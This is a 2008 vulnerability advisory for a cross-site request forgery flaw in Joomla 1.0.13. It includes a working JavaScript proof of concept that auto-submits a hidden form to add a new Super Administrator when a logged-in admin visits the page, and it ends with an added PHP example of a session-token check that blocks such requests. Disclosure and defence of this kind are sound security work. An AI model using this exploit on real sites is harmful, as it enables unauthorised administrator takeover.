joomla1013-csrf.txt

Posted on 09 January 2008

Author: Jose Carlos Nieto.
Date: Jan 08, 2008
Severity: Mild

There exists a Cross Site Request Forgery security hole in Joomla 1.0.13.

Background
==========

*Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source <http://en.wikipedia.org/wiki/Open_source_software> content management system <http://en.wikipedia.org/wiki/Content_management_system> for publishing content on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets <http://en.wikipedia.org/wiki/Intranet>. Joomla! is licensed under the GPL <http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork <http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo <http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.

Severity
========

Mild. It requires an administrator to be logged in and to be tricked into visiting a specially crafted webpage.

Summary
=======

Joomla! has no CSRF protection. A malicious user can trick an administrator into viewing a specially crafted webpage containing an exploit. This exploit can execute (without permission) any command the administrator would normally execute, such as publishing content or even adding a new administrator.

Solution
========

This problem has no solution at this time.

Disclosure timeline
===================

Oct 18 2007 - Vulnerability found.
Oct 18 2007 - Vulnerability reported to vendor.
Oct 18 2007 - Answer from vendor.
Jan 08 2008 - Advisory released.

Proof of Concept
================

If a logged-in administrator visits this page, a new administrator will be added to the victim's Joomla-powered website.

---- exploit code ----
<script type="text/javascript">
window.onload = function() {
  var url = "http://joomlasite.com/joomla/administrator/index2.php";
  var gid = 25;
  var user = 'custom_username';
  var pass = 'custom_password';
  var email = 'joe_cool@example.com';
  var param = {
    name: user,
    username: user,
    email: email,
    password: pass,
    password2: pass,
    gid: gid,
    block: 0,
    option: 'com_users',
    task: 'save',
    sendEmail: 1
  };
  var form = document.createElement('form');
  form.action = url;
  form.method = 'post';
  form.target = 'hidden';
  form.style.display = 'none';
  for (var i in param) {
    try {
      // ie
      var input = document.createElement('<input name="'+i+'">');
    } catch(e) {
      // other browsers
      var input = document.createElement('input');
      input.name = i;
    }
    input.setAttribute('value', param[i]);
    form.appendChild(input);
  }
  document.body.appendChild(form);
  form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">
---- exploit code ----
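
Because Joomla! has no CSRF protection, a request is accepted on the strength of the administrator's session cookie alone. The following is an added example, not Joomla! code and not part of the advisory: a minimal PHP per-session token check that rejects a forged request and accepts the form that carries the token. The function names, the `csrf_token` field name and the request data (constructed, modelled on the fields the proof of concept posts) are assumptions.

```php
<?php
// Added example (not Joomla! code). All names below are hypothetical.

// Issue, or reuse, the secret token bound to this administrator session.
// The real admin form would embed it as a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing request only if it is a POST that carries
// the token stored in the session.
function csrf_check(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false; // state changes are never accepted over GET
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($supplied)) {
        return false; // no token issued yet, or a malformed field
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed session for a logged-in administrator.
$session = ['user' => 'admin'];
$token = csrf_token($session);

// Constructed cross-site POST: the browser attaches the session cookie,
// but the other origin cannot read the token, so the field is absent.
$forged = [
    'option' => 'com_users',
    'task' => 'save',
    'username' => 'custom_username',
    'gid' => '25',
];

// The same fields submitted from the genuine admin form, token included.
$legitimate = $forged + ['csrf_token' => $token];

var_dump(csrf_check($session, 'POST', $forged));
var_dump(csrf_check($session, 'POST', $legitimate));
```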

 
